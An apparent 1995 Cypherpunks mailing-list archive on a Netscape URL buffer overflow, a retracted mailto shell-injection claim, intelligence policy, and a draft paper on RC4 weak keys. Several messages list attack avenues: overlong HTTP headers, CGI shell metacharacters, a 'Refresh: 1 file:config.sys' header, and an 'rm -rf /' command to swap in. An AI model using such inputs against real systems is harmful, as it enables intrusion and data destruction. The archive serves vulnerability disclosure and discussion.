I just verified in GDB using a stack trace that the Netscape overflow bug I mentioned is indeed a static stack buffer overflow. It trashes the stack. What this means is that in theory, it is possible to get a simple URL, if clicked on, to execute some code on someone's browser. Now the hard work begins...
Happy Hacking,
-Ray

From futplex at pseudonym.com Thu Sep 21 23:52:42 1995
From: futplex at pseudonym.com (Futplex)
Date: Thu, 21 Sep 95 23:52:42 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220612.CAA11441@clark.net>
Message-ID: <9509220652.AA06103@cs.umass.edu>

Ray Cromwell writes:
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:

Oh brother, this is unbelievable !

I'm using Netscape 1.1N under SunOS 4.1.2.

It turns out that the same (or a similar) flaw resides in the Open Location input routine -- perhaps this merely coincides with the code called when a URL is clicked. Anyway, pasting a URL with an overlong domain name a la Ray's example causes two things:

(1) Part of the Open Location window widget, below the entry box, gets overwritten onscreen with a portion of the entered URL.

(2) Netscape crashes with a segmentation fault (no core dump that I can see).

-Futplex

From jsw at neon.netscape.com Thu Sep 21 23:54:35 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 23:54:35 PDT
Subject: Netscape closes up 1 3/8 today!
In-Reply-To: <199509212030.NAA05084@infinity.c2.org>
Message-ID: <43tmht$qfe@tera.mcom.com>

In article <199509212125.RAA00188 at hoopsnake.cjs.net>, cjs at netcom.com (Christopher J. Shaulis) writes:
> And the sad part is that now that they have announced that they are
> dropping their unofficial Linux support, I really want to hurt
> Netscape badly.

This is news to me. We have engineers spending valuable time keeping our linux port running. If you tell me where you saw this, I will look into it.
--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From stewarts at ix.netcom.com Fri Sep 22 00:11:25 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 22 Sep 95 00:11:25 PDT
Subject: economic espionage (@#$%^&*)
Message-ID: <199509220711.AAA02426@ix9.ix.netcom.com>

>>> >It was said that Pres. Clinton had given a speech while
>>> >visiting the CIA HQ in Langley/Virginia. He allegedly
>>> >said in this speech that obtaining industrial
>>> >informations has the highest priority and this were the
>>> >new task for the spies.

Dr. John Deutsch, speaking to the National Press Club, also mentioned economic espionage, with the State Department as a primary customer, but was concerned about definitions of goals, etc. He did reassure the NPC that the CIA would continue to work with drug dealers and corrupt South American military and other scum who have information to sell, as well as cooperating more closely with the FBI and DEA, but on the other hand he does apparently view domestic operations as clearly outside the CIA's job. One set of content in his speech was the planned combination of the various satellite data interpretation organizations into one group of CIA/Pentagon/NRO/NSA/etc.

ObCrypto: One questioner asked him about the growing use of encoding and would the CIA be able to keep up eavesdropping on people. "We're very good at eavesdropping" was his main reply; he did acknowledge that there was an issue but didn't go into the party line about needing to have escrow to get GAK.

Clinton, meanwhile, reassured guests at a $1000/plate fundraising lunch that the Republicans' economic plans would mainly affect the poor and wouldn't trouble the rich too much...
:-)

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From rjc at clark.net Fri Sep 22 00:15:47 1995
From: rjc at clark.net (Ray Cromwell)
Date: Fri, 22 Sep 95 00:15:47 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509220652.AA06103@cs.umass.edu>
Message-ID: <199509220715.DAA27920@clark.net>

>
> Ray Cromwell writes:
> > I've found a Netscape bug which I suspect is a buffer overflow and
> > may have the potential for serious damage. If it is an overflow bug,
> > then it may be possible to infect every computer which accesses a web
> > page with Netscape. To see the bug, create an html file containing
> > the following:
>
> Oh brother, this is unbelievable !
>
> I'm using Netscape 1.1N under SunOS 4.1.2.
>
> It turns out that the same (or a similar) flaw resides in the Open Location
> input routine -- perhaps this merely coincides with the code called when a
> URL is clicked. Anyway, pasting a URL with an overlong domain name a la Ray's
> example causes two things:
>
> (1) Part of the Open Location window widget, below the entry box, gets
> overwritten onscreen with a portion of the entered URL.
>
> (2) Netscape crashes with a segmentation fault (no core dump that I can see).

The bug causes random things to happen because it trashes the stack. I just did a test with http://aaaaaaa.(repeat pattern 42 times, followed by 5 a's), that's 341 characters in the domain. After a coredump, I inspected the stack, and it has been trashed to hell, including the PC register which was 0x61616161 (or 'aaaa' in ascii)

THIS IS A SERIOUS BUG! Unlike the SSL crack (which took a supercomputer to crack), or the RNG (which doesn't affect many people since there is not much internet commerce actually going on), this bug has the potential to damage millions of computers! This is almost enough to scare me away from using netscape.
You can guard yourself by always observing the URL you are about to click on, but how many people will be able to keep that up all the time given that Surfing almost puts many people into a trancelike state?

[I hear Perry in the background groaning and muttering "I told you so"]

These buffer overflow bugs should be taught in every programming 101 course along with fencepost errors. I'm not even sure if I want to write the obligatory program to exploit the hack given that some malicious jerk would probably use it on his home page to attack people.

-Ray

From halvork at frodo.hiof.no Fri Sep 22 00:20:14 1995
From: halvork at frodo.hiof.no (Halvor Kise jr.)
Date: Fri, 22 Sep 95 00:20:14 PDT
Subject: Another Netscape Bug (and possible security hole)
Message-ID:

On Fri, 22 Sep 1995, Ray Cromwell wrote:
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:

Yes! Nice! At last I can include a big Netrape icon on my homepage. Maybe with the text "Netscape users, click here.." All the link does is to crash netscape... At last! Thanks Ray! :-)

- Halvor.

--
*** MEMENTO MORI ***
PGP-key by fingering halvork at frodo.hiof.no
http://www.hiof.no/~halvork/
* Support The Phil Zimmermann legal defense fund *
http://www.netresponse.com/zldf

From goedel at tezcat.com Fri Sep 22 00:24:28 1995
From: goedel at tezcat.com (Dietrich J.
Kappe)
Date: Fri, 22 Sep 95 00:24:28 PDT
Subject: Another Netscape Bug (and possible security hole)
Message-ID:

>Ray Cromwell writes:
>> I've found a Netscape bug which I suspect is a buffer overflow and
>> may have the potential for serious damage. If it is an overflow bug,
>> then it may be possible to infect every computer which accesses a web
>> page with Netscape. To see the bug, create an html file containing
>> the following:
>
>Oh brother, this is unbelievable !
>
>I'm using Netscape 1.1N under SunOS 4.1.2.
>
>It turns out that the same (or a similar) flaw resides in the Open Location
>input routine -- perhaps this merely coincides with the code called when a
>URL is clicked. Anyway, pasting a URL with an overlong domain name a la Ray's
>example causes two things:
>
>(1) Part of the Open Location window widget, below the entry box, gets
>overwritten onscreen with a portion of the entered URL.
>
>(2) Netscape crashes with a segmentation fault (no core dump that I can see).

Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try it out, I've put up a simple page with the url at http://www.redweb.com/experiment/bug.html

*warning* view the source before you click on strange links!!!

I don't do PPC assembler, so I can't tell you what happened.
From jsw at neon.netscape.com Fri Sep 22 00:34:29 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 00:34:29 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220612.CAA11441@clark.net>
Message-ID: <43tosm$qfe@tera.mcom.com>

In article <199509220612.CAA11441 at clark.net>, rjc at clark.net (Ray Cromwell) writes:
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:

Thanks for the report. I will make sure that this is fixed.

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From jsw at neon.netscape.com Fri Sep 22 00:53:01 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 00:53:01 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To:
Message-ID: <43tpv8$rom@tera.mcom.com>

OK, Perry was right, and it was wrong of me to argue with him based only on the code that I have personally seen. As we have already determined, I have not reviewed every line of code in netscape.

Not that I want to divert attention away from netscape(OK, maybe I do :-) ), but does this bug exist in any other common browser?

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
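The overlong-hostname crash discussed in the thread above (a fixed-size stack buffer receiving the host part of a URL, which Ray's core dump shows leaving the PC register as 0x61616161) reduced to its essentials, as an added example that is neither code from the thread nor Netscape's: `host_copy_unchecked` has the shape of the bug, and `host_extract` is the bounded replacement that refuses a host that does not fit instead of overrunning the buffer. The 64-byte limit, the function names and the test URL built from Ray's "aaaaaaa." pattern are assumptions constructed for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define HOST_MAX 64   /* assumed fixed buffer size; stands in for the browser's */

/* Shape of the bug under discussion: the host part of a URL is copied
 * into a fixed-size stack buffer with no length check. It is only ever
 * called with a short URL here; the 341-character host below would run
 * past `blah` and over the saved return address. */
static size_t host_copy_unchecked(const char *url)
{
    char blah[HOST_MAX];
    const char *p = strstr(url, "://");
    p = p ? p + 3 : url;
    size_t n = strcspn(p, "/:");      /* host ends at '/', ':' or NUL */
    memcpy(blah, p, n);               /* no comparison against sizeof blah */
    blah[n] = '\0';
    return strlen(blah);
}

/* Bounded version: copy the host into caller-supplied storage and
 * return -1 when it would not fit (terminator included), never overflow. */
int host_extract(const char *url, char *out, size_t outlen)
{
    const char *p = strstr(url, "://");
    p = p ? p + 3 : url;
    size_t n = strcspn(p, "/:");
    if (n == 0 || n >= outlen)
        return -1;
    memcpy(out, p, n);
    out[n] = '\0';
    return (int)n;
}

/* Constructed test input from Ray's message: "http://" followed by
 * "aaaaaaa." repeated 42 times and five more 'a's, 341 host characters. */
static char long_url[7 + 42 * 8 + 5 + 1];

const char *make_long_host_url(void)
{
    char *q = long_url;
    memcpy(q, "http://", 7); q += 7;
    for (int i = 0; i < 42; i++) { memcpy(q, "aaaaaaa.", 8); q += 8; }
    memcpy(q, "aaaaa", 5); q += 5;
    *q = '\0';
    return long_url;
}

int main(void)
{
    char host[HOST_MAX];
    const char *bad = make_long_host_url();
    const char *ok = "http://www.example.com/index.html";

    printf("constructed host length: %zu\n", strlen(bad) - 7);
    printf("unchecked copy of short host: %zu chars\n", host_copy_unchecked(ok));
    if (host_extract(bad, host, sizeof host) < 0)
        puts("overlong host rejected instead of overflowing");
    if (host_extract(ok, host, sizeof host) > 0)
        printf("bounded extraction: %s\n", host);
    return 0;
}
```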
From futplex at pseudonym.com Fri Sep 22 01:01:26 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:01:26 PDT
Subject: Mosaic Bug (same as Netscape bug) (was Re: Another Netscape Bug)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID: <9509220801.AA06875@cs.umass.edu>

Jeff Weinstein writes:
> Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?

Good question. Here's one answer, obtained using a minor variation on Ray's URL:

----------------------------------------------
Congratulations, you have found a bug in NCSA Mosaic 2.4 on Sun.

If a core file was generated in your directory, please run 'dbx Mosaic' (or 'dbx /path/Mosaic' if the Mosaic executable is not in your current directory) and then type:

dbx> where

and mail the results, and a description of what you were doing at the time, to mosaic-x at ncsa.uiuc.edu. We thank you for your support.

...exiting NCSA Mosaic now.
----------------------------------------------------

Now, the question is, does Netscape use _the same code_ that was used in Mosaic for this purpose ?

-Futplex

From unicorn at polaris.mindport.net Fri Sep 22 01:01:44 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Fri, 22 Sep 95 01:01:44 PDT
Subject: economic espionage (@#$%^&*)
In-Reply-To: <199509220711.AAA02426@ix9.ix.netcom.com>
Message-ID:

On Fri, 22 Sep 1995, Bill Stewart wrote:
>
> >>> >It was said that Pres. Clinton had given a speech while
> >>> >visiting the CIA HQ in Langley/Virginia. He allegedly
> >>> >said in this speech that obtaining industrial
> >>> >informations has the highest priority and this were the
> >>> >new task for the spies.
>
> Dr. John Deutsch, speaking to the National Press Club, also mentioned
> economic espionage, with the State Department as a primary
> customer, but was concerned about definitions of goals, etc.
> He did reassure the NPC that the CIA would continue to work with
> drug dealers and corrupt South American military and other scum
> who have information to sell, as well as cooperating more closely
> with the FBI and DEA, but on the other hand he does apparently
> view domestic operations as clearly outside the CIA's job.
> One set of content in his speech was the planned combination of
> the various satellite data interpretation organizations
> into one group of CIA/Pentagon/NRO/NSA/etc.

It's important here to distinguish economic "espionage" and economic "intelligence." Espionage refers to the stealing of secrets with humint, and generally the term economic espionage refers to the actual thefts as with the French government stealing bids, and bag jobbing American businessmen. Economic Intelligence is much older, and is more about economic analysis on a macro scale of the target country.

I mention these because the doublespeak can trip up people who aren't used to what the intelligence types are saying. John Deutsch is definitely an economic intelligence man, but has in past been quite opposed to economic espionage.

> ObCrypto: One questioner asked him about the growing use
> of encoding and would the CIA be able to keep up eavesdropping on
> people. "We're very good at eavesdropping" was his main reply;
> he did acknowledge that there was an issue but didn't go into
> the party line about needing to have escrow to get GAK.
>
> Clinton, meanwhile, reassured guests at a $1000/plate fundraising
> lunch that the Republicans' economic plans would mainly affect
> the poor and wouldn't trouble the rich too much... :-)
> #---
> # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
> # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
> #---
>

---
"In fact, had Bancroft not existed,              potestas scientiae in usu est
Franklin might have had to invent him."
                                                 in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From futplex at pseudonym.com Fri Sep 22 01:14:47 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:14:47 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220715.DAA27920@clark.net>
Message-ID: <9509220814.AA06967@cs.umass.edu>

On the bright side, mailto: hyperlinks containing extra-long domain names seem to be handled comparatively safely in both Netscape and Mosaic. (Perhaps they just have longer buffers ? ;)

Neither Netscape nor Mosaic crashes on a mailto:// of the same length as a ftp:// or http:// that _would_ crash them. Netscape appears to do some sort of truncation at some point (silently); Mosaic gives you a standard "server is not accessible or is refusing to serve the document" warning page.

(Netscape 1.1N, Mosaic 2.4, SunOS 4.1.2)

-Futplex

From rjc at clark.net Fri Sep 22 01:20:30 1995
From: rjc at clark.net (Ray Cromwell)
Date: Fri, 22 Sep 95 01:20:30 PDT
Subject: Netscape Server Attacks
Message-ID: <199509220820.EAA12405@clark.net>

No, calm down, I haven't found a hole in the server yet, but if you want to win some T-Shirts, here's some potential avenues to try. I've been messing with these, and maybe some other c'punk can find one that will work.

1) buffer overflow attacks in the HTTP request header

Example: The HTTP/1.0 full request has an "If-Modified-Since" header which takes a date string. If Netscape assumes this string is not going to be longer than a certain width.... Look for ways to attack the HTTP request headers. See http://www.w3.org/pub/WWW/Protocols/HTTP1.0/draft-ietf-http-spec.html

CGI attacks

2) Shell metacharacters, or extremely long paths, may lead the way to executing arbitrary shell commands on the server.

3) Overflow the URL in a CGI GET by using too many form variables in the response.
Server attacking client

4) use the Location: redirection header to send a long domain

5) use Location: redirection or Refresh: to load up file:localfile
You can force the browser to load up any arbitrary file the user has access to local to his client
Example: Refresh: 1 file:config.sys

6) send back a page with an EXTREME number of Motif HTML FORM widgets in a . E.g. send back 10,000 radio buttons.

Happy Hunting,
-Ray

From futplex at pseudonym.com Fri Sep 22 01:27:11 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:27:11 PDT
Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
In-Reply-To: <199509220519.BAA02311@frankenstein.piermont.com>
Message-ID: <9509220827.AA07056@cs.umass.edu>

David Van Wie writes:
> It just moves the prior art date from the date of invention to the date
> of filing the patent application.

.pm writes:
> Can you explain that? It doesn't make much sense...

I'll ask a more specific question: What happens if the chronology goes like this ?

(0) Alice invents a snaffleblort.
(1) Bob invents a snaffleblort.
(2) Bob files for a patent on a snaffleblort.

From what you said, it would appear that Alice's prior art won't count when it comes to considering the validity of Bob's patent claim. Is that correct ?

-Futplex

From rjc at clark.net Fri Sep 22 01:30:13 1995
From: rjc at clark.net (Ray Cromwell)
Date: Fri, 22 Sep 95 01:30:13 PDT
Subject: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <9509220814.AA06967@cs.umass.edu>
Message-ID: <199509220830.EAA13828@clark.net>

>
> On the bright side, mailto: hyperlinks containing extra-long domain names
> seem to be handled comparatively safely in both Netscape and Mosaic.
> (Perhaps they just have longer buffers ? ;)

Good question. My guess is, Netscape doesn't do any processing on the mailto: hyperlink at all, but merely passes it to a real mail delivery agent like Sendmail (or it uses MAPI under Win'95). Which begs the question, if Netscape is executing an external delivery agent, there may be the possibility of sneaking an attack in there and getting the shell to execute something. Hmm, let me try something.

WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered this before! Try a page with the following URL

test

Muahaha! Yet another security hole!
Clicking on this mailto brings up an xterm on my machine! Simply change the xterm& to "rm -rf /" and bingo! Sheesh. I better stop before I am on Netscape's most hated list.

-Ray

From rjc at clark.net Fri Sep 22 01:37:09 1995
From: rjc at clark.net (Ray Cromwell)
Date: Fri, 22 Sep 95 01:37:09 PDT
Subject: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <199509220830.EAA13828@clark.net>
Message-ID: <199509220836.EAA14476@clark.net>

Disregard that last message. Those drugs I was taking must have just kicked in. I was running another program in the background which coincidentally brought up an xterm at the same time I clicked on the link. Damn, and I thought I had found another bug. Ah well. There's probably one lurking there somewhere. It was good while it lasted. When I hit "send" and that xterm popped up, I almost jumped out of my seat. ;-) Remember this lesson, you should always try to repeat your bugs at least three times. ;-)

-Ray

From futplex at pseudonym.com Fri Sep 22 01:50:22 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:50:22 PDT
Subject: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <199509220830.EAA13828@clark.net>
Message-ID: <9509220850.AA07248@cs.umass.edu>

Ray Cromwell writes:
> WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered
> this before! Try a page with the following URL
>
> test
>
> Muahaha! Yet another security hole! Clicking on this mailto brings up
> an xterm on my machine!

This is curious, because Netscape 1.1N doesn't do this on my setup, unless I misunderstand your description somehow. The full string including the pipe and all comes up in the To: field of the standard Netscape mailer window. At that stage I see it as much less of a potential risk. I can't test what happens if you actually try to send mail to such a trojan horse URL, because there's some screwy configuration here that makes Netscape complain about not being able to connect to localhost (!?!) when I try to send mail from it.
Mosaic 2.4 gives a standard warning page in response to this.

(I'm using SunOS 4.1.2)

-Futplex

From futplex at pseudonym.com Fri Sep 22 02:01:29 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 02:01:29 PDT
Subject: The Next Hack
In-Reply-To: <199509211832.LAA24086@infinity.c2.org>
Message-ID: <9509220901.AA07381@cs.umass.edu>

sameer writes:
> 2) Organize a net-wide search over the space of the RNG seed to
> crack the private key of some well known secure server.
>
> 3) Release the private key to the net.

FWIW, for the record, I'm uncomfortable with this. It sounds unethical, IMHO. For me at least, targeting the key of some particular server that happens to be out there is over the line. If you said you would have someone volunteer a supposedly secure server for the challenge, I'd have no qualms. But hey, that's just one tentacle's opinion....

-Futplex

"...when you talk about destruction, don't you know that you can count me out"

From jsw at neon.netscape.com Fri Sep 22 02:22:41 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 02:22:41 PDT
Subject: Mosaic Bug (same as Netscape bug) (was Re: Another Netscape Bug)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID: <43tv6v$t7v@tera.mcom.com>

In article <9509220801.AA06875 at cs.umass.edu>, futplex at pseudonym.com (Futplex) writes:
> Now, the question is, does Netscape use _the same code_ that was used in
> Mosaic for this purpose ?

Absolutely not. There is not a single line of Mosaic code in our product.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From halvork at frodo.hiof.no Fri Sep 22 02:25:51 1995
From: halvork at frodo.hiof.no (Halvor Kise jr.)
Date: Fri, 22 Sep 95 02:25:51 PDT
Subject: Arena as well (was: Netscape Bug)
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I am sorry to report that also Arena has this bug..
:-(

- - Halvor.

Ray Cromwell said:
I've found a Netscape bug which I suspect is a buffer overflow and may have the potential for serious damage. If it is an overflow bug, then it may be possible to infect every computer which accesses a web page with Netscape. To see the bug, create an html file containing the following:

that xterm popped up, I almost jumped out of my seat. ;-) Remember
> this lesson, you should always try to repeat your bugs at least three
> times. ;-)

Thanks for quickly posting this retraction. For the record, netscape talks SMTP directly, and does not run an external program to send mail.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From rjc at clark.net Fri Sep 22 02:36:12 1995
From: rjc at clark.net (Ray Cromwell)
Date: Fri, 22 Sep 95 02:36:12 PDT
Subject: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <43tvj4$t7v@tera.mcom.com>
Message-ID: <199509220936.FAA21793@clark.net>

>
> In article <199509220836.EAA14476 at clark.net>, rjc at clark.net (Ray Cromwell) writes:
> > Disregard that last message. Those drugs I was taking must have just kicked
> > in. I was running another program in the background which coincidentally
> > brought up an xterm at the same time I clicked on the link. Damn,
> > and I thought I had found another bug. Ah well. There's probably one lurking
> > there somewhere. It was good while it lasted. When I hit "send" and
> > that xterm popped up, I almost jumped out of my seat. ;-) Remember
> > this lesson, you should always try to repeat your bugs at least three
> > times. ;-)
>
> Thanks for quickly posting this retraction. For the record, netscape
> talks SMTP directly, and does not run an external program to send mail.

No problem. ;-) I congratulate you guys (Netscape) for reacting so quickly. ;-)

BTW, I checked lynx for the big domain bug and it also crashes.
It could be a unix bug, but my own test program fails to crash looking up a 1000 character domain. Even so, Netscape should be enforcing a sanity check on the domain.

-Ray

From heesen at zpr.uni-koeln.de Fri Sep 22 02:46:54 1995
From: heesen at zpr.uni-koeln.de (Rainer Heesen)
Date: Fri, 22 Sep 95 02:46:54 PDT
Subject: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <9509220850.AA07248@cs.umass.edu>
Message-ID: <9509221146.ZM25754@Sysiphos.MI.Uni-Koeln.DE>

On Sep 22, 4:50am, Futplex wrote:
> Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
> Ray Cromwell writes:
> > WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered
> > this before! Try a page with the following URL
> >
> > test
> >
> > Muahaha! Yet another security hole! Clicking on this mailto brings up
> > an xterm on my machine!
>
> This is curious, because Netscape 1.1N doesn't do this on my setup, unless I
> misunderstand your description somehow. The full string including the pipe
> and all come up in the To: field of the standard Netscape mailer window. At
> that stage I see it as much less of a potential risk. I can't test what
> happens if you actually try to send mail to such a trojan horse URL, because
> there's some screwy configuration here that makes Netscape complain about
> not being able to connect to localhost (!?!) when I try to send mail from it.
>
> Mosaic 2.4 gives a standard warning page in response to this.
>
> (I'm using SunOS 4.1.2)
>
> -Futplex
>-- End of excerpt from Futplex

This is not curious. Ray uses a very old sendmail version. It's not a Netscape bug, it's rather a sendmail bug.

Cheers
Rainer

From AndrewR at beetle.vironix.co.za Fri Sep 22 03:01:07 1995
From: AndrewR at beetle.vironix.co.za (Andrew Roos)
Date: Fri, 22 Sep 95 03:01:07 PDT
Subject: Weak Keys in RC4
Message-ID: <3062899D@beetle.vironix.co.za>

-----BEGIN PGP SIGNED MESSAGE-----

A CLASS OF WEAK KEYS IN THE RC4 STREAM CIPHER

PRELIMINARY DRAFT

ANDREW ROOS
VIRONIX SOFTWARE LABORATORIES

1. INTRODUCTION

This paper discusses a class of weak keys in RSA's RC4 stream cipher. It shows that for at least 1 out of every 256 possible keys the initial byte of the pseudo-random stream generated by RC4 is strongly correlated with only a few bytes of the key, which effectively reduces the work required to exhaustively search RC4 key spaces.

2. STATE TABLE INITIALIZATION IN RC4

Although the RC4 algorithm has not been published by RSA Data Security, source code to implement the algorithm was anonymously posted to the Cypherpunks mailing list several months ago. The success of the Cypherpunks' brute-force attack on SSL with a 40-bit key indicates that the source code published did accurately implement RC4.

RC4 uses a variable length key from 1 to 256 bytes to initialize a 256-byte state table which is used for the subsequent generation of pseudo-random bytes. The state table is first initialized to the sequence {0,1,2,...,255}. Then:

   1 index1 = 0;
   2 index2 = 0;
   3
   4 for(counter = 0; counter < 256; counter++)
   5 {
   6   index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;
   7   swap_byte(&state[counter], &state[index2]);
   8   index1 = (index1 + 1) % key_data_len;
   9 }

Note that the only line which directly affects the state table is line 7, when two bytes in the table are exchanged. The first byte is indexed by "counter", which is incremented for each iteration of the loop. The second byte is indexed by "index2" which is a function of the key. Hence each element of the state table will be swapped at least once (although possibly with itself), when it is indexed by "counter". It may also be swapped zero, one or more times when it is indexed by "index2".

If we assume for the moment that "index2" is a uniformly distributed pseudo-random number, then the probability that a particular single element of the state table will be indexed by "index2" at some time during the initialization routine is:

   P = 1 - (255/256) ^ 255 = 0.631

(The exponent is 255 because we can disregard the case when "index2" and "counter" both index the same element, since this will not affect its value.)

Conversely, there is a 37% probability that a particular element will _not_ be indexed by "index2" during initialization, so its final value in the state table will only be affected by a single swap, when it is indexed by "counter". Since key bytes are used sequentially (starting again at the beginning when the key is exhausted), this implies:

A. Given a key length of K bytes, and E < K, there is a 37% probability that element E of the state table depends only on elements 0..E (inclusive) of the key. (This is approximate since "index2" is unlikely to be uniformly distributed.)

In order to make use of this, we need to determine the most likely values for elements of the state table. Since each element is swapped at least once (when it is indexed by "counter"), it is necessary to take into account the likely effect of this swap.

Swapping is a nasty non-linear process which is hard to analyze. However, when dealing with the first few elements of the state table, there is a high probability that the byte with which the element is swapped has not itself been involved in any previous exchanges, and therefore retains its initial value {0,1,2,...,255}. Similarly, when dealing with the first few elements of the state table, there is also a significant probability that none of the state elements added to index2 in line 6 of the algorithm has been swapped either. This means that the most likely value of an element in the state table can be estimated by assuming that state[x] == x in the algorithm above.

In this case, the algorithm becomes:

   1 index1 = 0;
   2 index2 = 0;
   3
   4 for(counter = 0; counter < 256; counter++)
   5 {
   6   index2 = (key_data_ptr[index1] + counter + index2) % 256;
   7   state[counter] = index2;
   8   index1 = (index1 + 1) % key_data_len;
   9 }

Which can be reduced to:

B. The most likely value for element E of the state table is:

   S[E] = X(E) + E(E+1)/2

where X(E) is the sum of bytes 0..E (inclusive) of the key. (When calculating the sum of key elements, the key is considered to "wrap around" on itself.)

Given this analysis, we can calculate the probability for each element of the state table that its value is the "most likely value" of B above. The easiest way to do this is to evaluate the state tables produced from a number of pseudo-randomly generated RC4 keys. The following table shows the results for the first 47 elements from a trial of 100 000 eighty-bit RC4 keys:

   Element   Probability (%)
   0-7       37.0 36.8 36.2 35.8 34.9 34.0 33.0 32.2
   8-15      30.9 29.8 28.5 27.5 26.0 24.5 22.9 21.6
   16-23     20.3 18.9 17.3 16.1 14.7 13.5 12.4 11.2
   24-31     10.1  9.0  8.2  7.4  6.4  5.7  5.1  4.4
   32-39      3.9  3.5  3.0  2.6  2.3  2.0  1.7  1.4
   40-47      1.3  1.2  1.0  0.9  0.8  0.7  0.6  0.6

The table confirms that there is a significant correlation between the first few values in the state table and the "likely value" predicted by B.

3. WEAK KEYS

The RC4 state table is used to generate a pseudo-random stream which is XORed with the plaintext to give the ciphertext. The algorithm used to generate the stream is as follows:

x and y are initialized to 0. To generate each byte:

   1 x = (x + 1) % 256;
   2 y = (state[x] + y) % 256;
   3 swap_byte(&state[x], &state[y]);
   4 xorIndex = (state[x] + state[y]) % 256;
   5 GeneratedByte = state[xorIndex];

One way to exploit our analysis of the state table is to find circumstances under which one or more generated bytes are strongly correlated with a small subset of the key bytes. Consider what happens when generating the first byte if state[1] == 1.

   1 x = (0 + 1) % 256;                 /* x == 1 */
   2 y = (state[1] + 0) % 256;          /* y == 1 */
   3 swap_byte(&state[1], &state[1]);   /* no effect */
   4 xorIndex = (state[1] + state[1]);  /* xorIndex = 2 */
   5 GeneratedByte = state[2]

And we know that state[2] has a high probability of being

   S[2] = K[0] + K[1] + K[2] + 2(2+1)/2

Similarly,

   S[1] = K[0] + K[1] + 1(1+1)/2

So to make it probable that S[1] == 1, we have:

   K[0] + K[1] == 0 (mod 256)

In which case the most likely value for S[2] is:

   S[2] = K[2] + 3

This allows us to identify a class of weak keys:

C. Given an RC4 key K[0]..K[N] with K[0] + K[1] == 0 (mod 256), there is a significant probability that the first byte generated by RC4 will be K[2] + 3 (mod 256).

Note that there are two special cases, caused by "unexpected" swapping during key generation. When K[0]==1, the "expected" output byte is K[2] + 2, and when K[0]==2, the expected value is K[2] + 1.

There are a number of similar classes of "weak keys" which only affect a few keys out of every 65536. However the particular symmetry in this class means that it affects one key in 256, making it the most interesting instance.

Once again I took the easy way out and used simulation to determine the approximate probability that result C holds for any given key. Probabilities ranged between 12% and 16% depending on the values of K[0] and K[1], with a mean of about 13.8%. All these figures are significantly greater than the 0.39% which would be expected from an uncorrelated generator. The key length used was again 80 bits.

This works the other way around as well: given the first byte B[0] generated by a weak key, the probability that K[2]==B[0]-3 (mod 256) is 13.8%.

4. EXPLOITING WEAK KEYS IN RC4

Having found a class of weak keys, we need a practical way to attack RC4 based cryptosystems using them. The most obvious way would be to search potential weak keys first during an exhaustive attack. However since only one in every 256 keys is weak, the effective reduction in search space is not particularly significant.

